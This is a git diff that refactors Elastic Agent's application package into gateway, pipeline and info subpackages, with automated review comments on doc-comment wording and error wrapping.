@@ -462,7 +465,7 @@ func TestRetriesOnFailures(t *testing.T) { Backoff: backoffSettings{Init: 10 * time.Minute, Max: 20 * time.Minute}, }, func( t *testing.T, - gateway FleetGateway, + gateway gateway.FleetGateway, client *testingClient, dispatcher *testingDispatcher, scheduler *scheduler.Stepper, diff --git a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go similarity index 98% rename from x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go index b229f3cff08..59994d1d454 100644 --- a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleet/noop_status_controller.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleet import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" diff --git a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go b/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go similarity index 81% rename from x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go rename to x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go index e25e7792fb1..a1e7d2bbcca 100644 --- a/x-pack/elastic-agent/pkg/agent/application/fleet_gateway_local.go +++ b/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver/fleet_gateway_local.go 
@@ -2,16 +2,19 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package fleetserver import ( "context" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" ) const gatewayWait = 2 * time.Second @@ -38,17 +41,18 @@ type fleetServerWrapper struct { log *logger.Logger cfg *configuration.FleetAgentConfig injectedCfg *config.Config - wrapped FleetGateway - emitter emitterFunc + wrapped gateway.FleetGateway + emitter pipeline.EmitterFunc } -func wrapLocalFleetServer( +// New creates a new fleet server gateway wrapping another fleet gateway. +func New( ctx context.Context, log *logger.Logger, cfg *configuration.FleetAgentConfig, rawConfig *config.Config, - wrapped FleetGateway, - emitter emitterFunc) (FleetGateway, error) { + wrapped gateway.FleetGateway, + emitter pipeline.EmitterFunc) (gateway.FleetGateway, error) { if cfg.Server == nil { // not running a local Fleet Server return wrapped, nil @@ -78,8 +82,8 @@ func (w *fleetServerWrapper) Start() error { } // SetClient sets the client for the wrapped gateway. -func (w *fleetServerWrapper) SetClient(client clienter) { - w.wrapped.SetClient(client) +func (w *fleetServerWrapper) SetClient(c client.Sender) { + w.wrapped.SetClient(c) } func injectFleetServer(rawConfig *config.Config) (*config.Config, error) { 
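Review bot: The doc comment added for `New` says it creates a gateway wrapping another one, but the first branch visible in the hunk returns `wrapped` unchanged when `cfg.Server == nil`. Now that the constructor is exported, I would state that in the comment, e.g. `// New wraps the given gateway with a local Fleet Server gateway; when cfg.Server is nil it returns wrapped unchanged.` The rest of New's body is outside the hunk.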
diff --git a/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go b/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go
new file mode 100644
index 00000000000..c14ab8d38c8
--- /dev/null
+++ b/x-pack/elastic-agent/pkg/agent/application/gateway/gateway.go
@@ -0,0 +1,19 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package gateway
+
+import "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client"
+
+// FleetGateway is a gateway between the Agent and the Fleet API, it's take cares of all the
+// bidirectional communication requirements. The gateway aggregates events and will periodically
+// call the API to send the events and will receive actions to be executed locally.
+// The only supported action for now is a "ActionPolicyChange".
+type FleetGateway interface {
+ // Start starts the gateway.
+ Start() error
+
+ // Set the client for the gateway.
+ SetClient(client.Sender)
+}
diff --git a/x-pack/elastic-agent/pkg/agent/application/global_config.go b/x-pack/elastic-agent/pkg/agent/application/global_config.go
deleted file mode 100644
index cdc6dda02e9..00000000000
--- a/x-pack/elastic-agent/pkg/agent/application/global_config.go
+++ /dev/null
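Review bot: In the new gateway.go, the comment on the second interface method, `// Set the client for the gateway.`, does not start with the method name and the parameter is unnamed. Writing `// SetClient sets the client used by the gateway.` with `SetClient(c client.Sender)` would be consistent with the `Start` comment above it. The type comment also has a typo: "it's take cares of" should read "it takes care of". Since this interface is now the exported seam between packages, the comment could also say whether SetClient may be called while the gateway is running, which the hunk does not show.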
@@ -1,39 +0,0 @@
-// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
-// or more contributor license agreements. Licensed under the Elastic License;
-// you may not use this file except in compliance with the Elastic License.
-
-package application
-
-import (
- "runtime"
-
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths"
-
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors"
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config"
-)
-
-// InjectAgentConfig injects config to a provided configuration.
-func InjectAgentConfig(c *config.Config) error {
- globalConfig := agentGlobalConfig()
- if err := c.Merge(globalConfig); err != nil {
- return errors.New("failed to inject agent global config", err, errors.TypeConfig)
- }
-
- return nil
-}
-
-// agentGlobalConfig gets global config used for resolution of variables inside configuration
-// such as ${path.data}.
-func agentGlobalConfig() map[string]interface{} {
- return map[string]interface{}{
- "path": map[string]interface{}{
- "data": paths.Data(),
- "config": paths.Config(),
- "home": paths.Home(),
- "logs": paths.Logs(),
- },
- "runtime.os": runtime.GOOS,
- "runtime.arch": runtime.GOARCH,
- }
-}
diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go b/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go
deleted file mode 100644
index 56b5ee3499c..00000000000
--- a/x-pack/elastic-agent/pkg/agent/application/handler_action_application.go
+++ /dev/null
@@ -1,31 +0,0 @@
-// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
-// or more contributor license agreements. Licensed under the Elastic License;
-// you may not use this file except in compliance with the Elastic License.
-
-package application
-
-import (
- "context"
- "fmt"
-
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger"
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi"
-)
-
-type handlerAppAction struct {
- log *logger.Logger
-}
-
-func (h *handlerAppAction) Handle(ctx context.Context, a action, acker fleetAcker) error {
- h.log.Debugf("handlerAppAction: action '%+v' received", a)
- action, ok := a.(*fleetapi.ActionApp)
- if !ok {
- return fmt.Errorf("invalid type, expected ActionApp and received %T", a)
- }
-
- _ = action
-
- // TODO: handle app action
-
- return nil
-}
diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_default.go b/x-pack/elastic-agent/pkg/agent/application/handler_default.go
deleted file mode 100644
index 8cbc1985d00..00000000000
--- a/x-pack/elastic-agent/pkg/agent/application/handler_default.go
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
-// or more contributor license agreements. Licensed under the Elastic License;
-// you may not use this file except in compliance with the Elastic License.
-
-package application
-
-import (
- "context"
-
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger"
-)
-
-type handlerDefault struct {
- log *logger.Logger
-}
-
-func (h *handlerDefault) Handle(_ context.Context, a action, acker fleetAcker) error {
- h.log.Errorf("HandlerDefault: action '%+v' received", a)
- return nil
-}
diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go b/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go
deleted file mode 100644
index b263bf6be8d..00000000000
--- a/x-pack/elastic-agent/pkg/agent/application/handler_unknown.go +++ /dev/null @@ -1,20 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" -) - -type handlerUnknown struct { - log *logger.Logger -} - -func (h *handlerUnknown) Handle(_ context.Context, a action, acker fleetAcker) error { - h.log.Errorf("HandlerUnknown: action '%+v' received", a) - return nil -} diff --git a/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go b/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go index ccddf448149..ea44265141b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/agent_metadata.go @@ -10,6 +10,7 @@ import ( "runtime" "strings" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" "github.com/elastic/go-sysinfo" "github.com/elastic/go-sysinfo/types" @@ -118,6 +119,21 @@ const ( hostMACKey = "host.mac" ) +// Metadata loads metadata from disk. +func Metadata() (*ECSMeta, error) { + agentInfo, err := NewAgentInfo() + if err != nil { + return nil, err + } + + meta, err := agentInfo.ECSMetadata() + if err != nil { + return nil, errors.New(err, "failed to gather host metadata") + } + + return meta, nil +} + // ECSMetadata returns an agent ECS compliant metadata. func (i *AgentInfo) ECSMetadata() (*ECSMeta, error) { hostname, err := os.Hostname() 
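Review bot: The comment `// Metadata loads metadata from disk.` on the new `Metadata` function in agent_metadata.go does not match the visible code, which builds a fresh `AgentInfo` with `NewAgentInfo()` and then calls `ECSMetadata()`, whose first visible step is `os.Hostname()`. A comment such as `// Metadata creates an AgentInfo and returns its ECS metadata.` would describe it. The `NewAgentInfo` error is also returned bare while the `ECSMetadata` error is wrapped; wrapping both keeps the failure attributable, e.g. `return nil, errors.New(err, "failed to load agent info")`. The fleet gateway's execute calls `info.Metadata()` on each checkin, so a new `AgentInfo` is constructed every time; that may be avoidable if the gateway already holds one, which is worth confirming. ECSMetadata's body continues outside the hunk.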
diff --git a/x-pack/elastic-agent/pkg/config/operations/enricher.go b/x-pack/elastic-agent/pkg/agent/application/info/inject_config.go similarity index 98% rename from x-pack/elastic-agent/pkg/config/operations/enricher.go rename to x-pack/elastic-agent/pkg/agent/application/info/inject_config.go index 24e2234b00c..6228a9a70bb 100644 --- a/x-pack/elastic-agent/pkg/config/operations/enricher.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/inject_config.go @@ -2,13 +2,12 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package operations +package info import ( "runtime" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" ) diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go deleted file mode 100644 index bae9f82e7f6..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go +++ /dev/null 
@@ -1,142 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "fmt" - - yaml "gopkg.in/yaml.v2" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config/operations" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" -) - -// InspectConfigCmd is an inspect subcommand that shows configurations of the agent. -type InspectConfigCmd struct { - cfgPath string -} - -// NewInspectConfigCmd creates a new inspect command. -func NewInspectConfigCmd(configPath string, -) (*InspectConfigCmd, error) { - return &InspectConfigCmd{ - cfgPath: configPath, - }, nil -} - -// Execute inspects agent configuration. 
-func (c *InspectConfigCmd) Execute() error { - return c.inspectConfig() -} - -func (c *InspectConfigCmd) inspectConfig() error { - fullCfg, err := operations.LoadFullAgentConfig(c.cfgPath) - if err != nil { - return err - } - - return printConfig(fullCfg) -} - -func loadConfig(configPath string) (*config.Config, error) { - rawConfig, err := config.LoadFile(configPath) - if err != nil { - return nil, err - } - - path := paths.AgentConfigFile() - - store := storage.NewDiskStore(path) - reader, err := store.Load() - if err != nil { - return nil, errors.New(err, "could not initialize config store", - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - config, err := config.NewConfigFrom(reader) - if err != nil { - return nil, errors.New(err, - fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), - errors.TypeFilesystem, - errors.M(errors.MetaKeyPath, path)) - } - - // merge local configuration and configuration persisted from fleet. - rawConfig.Merge(config) - - if err := InjectAgentConfig(rawConfig); err != nil { - return nil, err - } - - return rawConfig, nil -} - -func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { - log, err := newErrorLogger() - if err != nil { - return nil, err - } - - stateStore, err := store.NewStateStoreWithMigration(log, paths.AgentActionStoreFile(), paths.AgentStateStoreFile()) - if err != nil { - return nil, err - } - - for _, c := range stateStore.Actions() { - cfgChange, ok := c.(*fleetapi.ActionPolicyChange) - if !ok { - continue - } - - fmt.Println("Action ID:", cfgChange.ID()) - return cfgChange.Policy, nil - } - return nil, nil -} - -func printMapStringConfig(mapStr map[string]interface{}) error { - l, err := newErrorLogger() - if err != nil { - return err - } - caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), l, status.NewController(l)) - if err != nil { - return err - } - - newCfg, err := caps.Apply(mapStr) - if err != nil { - return errors.New(err, "failed 
to apply capabilities") - } - newMap, ok := newCfg.(map[string]interface{}) - if !ok { - return errors.New("config returned from capabilities has invalid type") - } - - data, err := yaml.Marshal(newMap) - if err != nil { - return errors.New(err, "could not marshal to YAML") - } - - fmt.Println(string(data)) - return nil -} - -func printConfig(cfg *config.Config) error { - mapStr, err := cfg.ToMapStr() - if err != nil { - return err - } - - return printMapStringConfig(mapStr) -} diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go deleted file mode 100644 index 6303c23c2eb..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go +++ /dev/null 
@@ -1,274 +0,0 @@ -// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -// or more contributor license agreements. Licensed under the Elastic License; -// you may not use this file except in compliance with the Elastic License. - -package application - -import ( - "context" - "fmt" - - "github.com/elastic/beats/v7/libbeat/logp" - "github.com/elastic/go-sysinfo" - - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" -) - -// InspectOutputCmd is an inspect subcommand that shows configurations of the agent. -type InspectOutputCmd struct { - cfgPath string - output string - program string -} - -// NewInspectOutputCmd creates a new inspect command. -func NewInspectOutputCmd(configPath, output, program string) (*InspectOutputCmd, error) { - return &InspectOutputCmd{ - cfgPath: configPath, - output: output, - program: program, - }, nil -} - -// Execute tries to enroll the agent into Fleet. 
-func (c *InspectOutputCmd) Execute() error { - agentInfo, err := info.NewAgentInfo() - if err != nil { - return err - } - - if c.output == "" { - return c.inspectOutputs(agentInfo) - } - - return c.inspectOutput(agentInfo) -} - -func (c *InspectOutputCmd) inspectOutputs(agentInfo *info.AgentInfo) error { - rawConfig, err := loadConfig(c.cfgPath) - if err != nil { - return err - } - - cfg, err := configuration.NewFromConfig(rawConfig) - if err != nil { - return err - } - - l, err := newErrorLogger() - if err != nil { - return err - } - - if configuration.IsStandalone(cfg.Fleet) { - return listOutputsFromConfig(l, agentInfo, rawConfig, true) - } - - fleetConfig, err := loadFleetConfig(rawConfig) - if err != nil { - return err - } else if fleetConfig == nil { - return fmt.Errorf("no fleet config retrieved yet") - } - - return listOutputsFromMap(l, agentInfo, fleetConfig, false) -} - -func listOutputsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) error { - programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) - if err != nil { - return err - - } - - for k := range programsGroup { - fmt.Println(k) - } - - return nil -} - -func listOutputsFromMap(log *logger.Logger, agentInfo *info.AgentInfo, cfg map[string]interface{}, isStandalone bool) error { - c, err := config.NewConfigFrom(cfg) - if err != nil { - return err - } - - return listOutputsFromConfig(log, agentInfo, c, isStandalone) -} - -func (c *InspectOutputCmd) inspectOutput(agentInfo *info.AgentInfo) error { - rawConfig, err := loadConfig(c.cfgPath) - if err != nil { - return err - } - - cfg, err := configuration.NewFromConfig(rawConfig) - if err != nil { - return err - } - - l, err := newErrorLogger() - if err != nil { - return err - } - - if configuration.IsStandalone(cfg.Fleet) { - return printOutputFromConfig(l, agentInfo, c.output, c.program, rawConfig, true) - } - - fleetConfig, err := loadFleetConfig(rawConfig) - if err != nil { - 
return err - } else if fleetConfig == nil { - return fmt.Errorf("no fleet config retrieved yet") - } - - return printOutputFromMap(l, agentInfo, c.output, c.program, fleetConfig, true) -} - -func printOutputFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg *config.Config, isStandalone bool) error { - programsGroup, err := getProgramsFromConfig(log, agentInfo, cfg, isStandalone) - if err != nil { - return err - - } - - for k, programs := range programsGroup { - if k != output { - continue - } - - var programFound bool - for _, p := range programs { - if programName != "" && programName != p.Spec.Cmd { - continue - } - - programFound = true - fmt.Printf("[%s] %s:\n", k, p.Spec.Cmd) - printMapStringConfig(p.Configuration()) - fmt.Println("---") - } - - if !programFound { - return fmt.Errorf("program '%s' is not recognized within output '%s', try running `elastic-agent inspect output` to find available outputs", - programName, - output) - } - - return nil - } - - return fmt.Errorf("output '%s' is not recognized, try running `elastic-agent inspect output` to find available outputs", output) - -} - -func printOutputFromMap(log *logger.Logger, agentInfo *info.AgentInfo, output, programName string, cfg map[string]interface{}, isStandalone bool) error { - c, err := config.NewConfigFrom(cfg) - if err != nil { - return err - } - - return printOutputFromConfig(log, agentInfo, output, programName, c, isStandalone) -} - -func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *config.Config, isStandalone bool) (map[string][]program.Program, error) { - monitor := noop.NewMonitor() - router := &inmemRouter{} - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - composableCtrl, err := composable.New(log, cfg) - if err != nil { - return nil, err - } - composableWaiter := newWaitForCompose(composableCtrl) - modifiers := &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: 
[]filterFunc{filters.StreamChecker}, - } - - if !isStandalone { - sysInfo, err := sysinfo.Host() - if err != nil { - return nil, errors.New(err, - "fail to get system information", - errors.TypeUnexpected) - } - modifiers.Filters = append(modifiers.Filters, injectFleet(cfg, sysInfo.Info(), agentInfo)) - } - - caps, err := capabilities.Load(paths.AgentCapabilitiesPath(), log, status.NewController(log)) - if err != nil { - return nil, err - } - - emit, err := emitter( - ctx, - log, - agentInfo, - composableWaiter, - router, - modifiers, - caps, - monitor, - ) - if err != nil { - return nil, err - } - - if err := emit(cfg); err != nil { - return nil, err - } - composableWaiter.Wait() - return router.programs, nil -} - -type inmemRouter struct { - programs map[string][]program.Program -} - -func (r *inmemRouter) Dispatch(id string, grpProg map[routingKey][]program.Program) error { - r.programs = grpProg - return nil -} - -func newErrorLogger() (*logger.Logger, error) { - return logger.NewWithLogpLevel("", logp.ErrorLevel) -} - -type waitForCompose struct { - controller composable.Controller - done chan bool -} - -func newWaitForCompose(wrapped composable.Controller) *waitForCompose { - return &waitForCompose{ - controller: wrapped, - done: make(chan bool), - } -} - -func (w *waitForCompose) Run(ctx context.Context, cb composable.VarsCallback) error { - err := w.controller.Run(ctx, func(vars []*transpiler.Vars) { - cb(vars) - w.done <- true - }) - return err -} - -func (w *waitForCompose) Wait() { - <-w.done -} diff --git a/x-pack/elastic-agent/pkg/agent/application/local_meta.go b/x-pack/elastic-agent/pkg/agent/application/local_meta.go deleted file mode 100644 index 540f74ad924..00000000000 --- a/x-pack/elastic-agent/pkg/agent/application/local_meta.go +++ /dev/null 
@@ -1,24 +0,0 @@
-// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
-// or more contributor license agreements. Licensed under the Elastic License;
-// you may not use this file except in compliance with the Elastic License.
-
-package application
-
-import (
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info"
- "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors"
-)
-
-func metadata() (*info.ECSMeta, error) {
- agentInfo, err := info.NewAgentInfo()
- if err != nil {
- return nil, err
- }
-
- meta, err := agentInfo.ECSMetadata()
- if err != nil {
- return nil, errors.New(err, "failed to gather host metadata")
- }
-
- return meta, nil
-}
diff --git a/x-pack/elastic-agent/pkg/agent/application/local_mode.go b/x-pack/elastic-agent/pkg/agent/application/local_mode.go
index 7a16951efe8..ffb59f281ff 100644
--- a/x-pack/elastic-agent/pkg/agent/application/local_mode.go
+++ b/x-pack/elastic-agent/pkg/agent/application/local_mode.go
@@ -10,8 +10,12 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" @@ -23,19 +27,11 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/dir" + acker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" ) -type emitterFunc func(*config.Config) error - -// ConfigHandler is capable of handling config, perform actions at it, shutdown any long running process. -type ConfigHandler interface { - HandleConfig(configrequest.Request) error - Close() error - Shutdown() -} - type discoverFunc func() ([]string, error) // ErrNoConfiguration is returned when no configuration are found. 
@@ -47,7 +43,7 @@ type Local struct { bgContext context.Context cancelCtxFn context.CancelFunc log *logger.Logger - router *router + router pipeline.Router source source agentInfo *info.AgentInfo srv *server.Server @@ -80,7 +76,7 @@ func newLocal( } if log == nil { - log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig) + log, err = logger.NewFromConfig("", cfg.Settings.LoggingConfig, true) if err != nil { return nil, err } @@ -106,7 +102,7 @@ func newLocal( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(localApplication.bgContext, agentInfo, cfg.Settings, localApplication.srv, reporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -118,15 +114,15 @@ func newLocal( } discover := discoverer(pathConfigFile, cfg.Settings.Path) - emit, err := emitter( + emit, err := emitter.New( localApplication.bgContext, log, agentInfo, composableCtrl, router, - &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker}, + &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker}, }, caps, monitor, @@ -153,7 +149,7 @@ func newLocal( log, []context.CancelFunc{localApplication.cancelCtxFn}, reexec, - newNoopAcker(), + acker.NewAcker(), reporter, caps) uc.SetUpgrader(upgrader) diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go index 7eb95709a7e..68902b0de72 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go 
@@ -7,15 +7,22 @@ package application import ( "context" "fmt" - "io" - "net/http" - "net/url" "github.com/elastic/go-sysinfo" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filters" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway" + fleetgateway "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway/fleet" + localgateway "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/gateway/fleetserver" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/stream" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" 
@@ -30,19 +37,20 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/fleet" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/lazy" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" reporting "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter" fleetreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet" logreporter "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/log" ) -type apiClient interface { - Send( - method string, - path string, - params url.Values, - headers http.Header, - body io.Reader, - ) (*http.Response, error) +type stateStore interface { + Add(fleetapi.Action) + AckToken() string + SetAckToken(ackToken string) + Save() error + Actions() []fleetapi.Action } // Managed application, when the application is run in managed mode, most of the configuration are @@ -52,10 +60,9 @@ type Managed struct { cancelCtxFn context.CancelFunc log *logger.Logger Config configuration.FleetAgentConfig - api apiClient agentInfo *info.AgentInfo - gateway FleetGateway - router *router + gateway gateway.FleetGateway + router pipeline.Router srv *server.Server stateStore stateStore upgrader *upgrade.Upgrader @@ -76,7 +83,7 @@ func newManaged( return nil, err } - client, err := fleetapi.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) + client, err := client.NewAuthWithConfig(log, cfg.Fleet.AccessAPIKey, cfg.Fleet.Kibana) if err != nil { return nil, errors.New(err, "fail to create API client", 
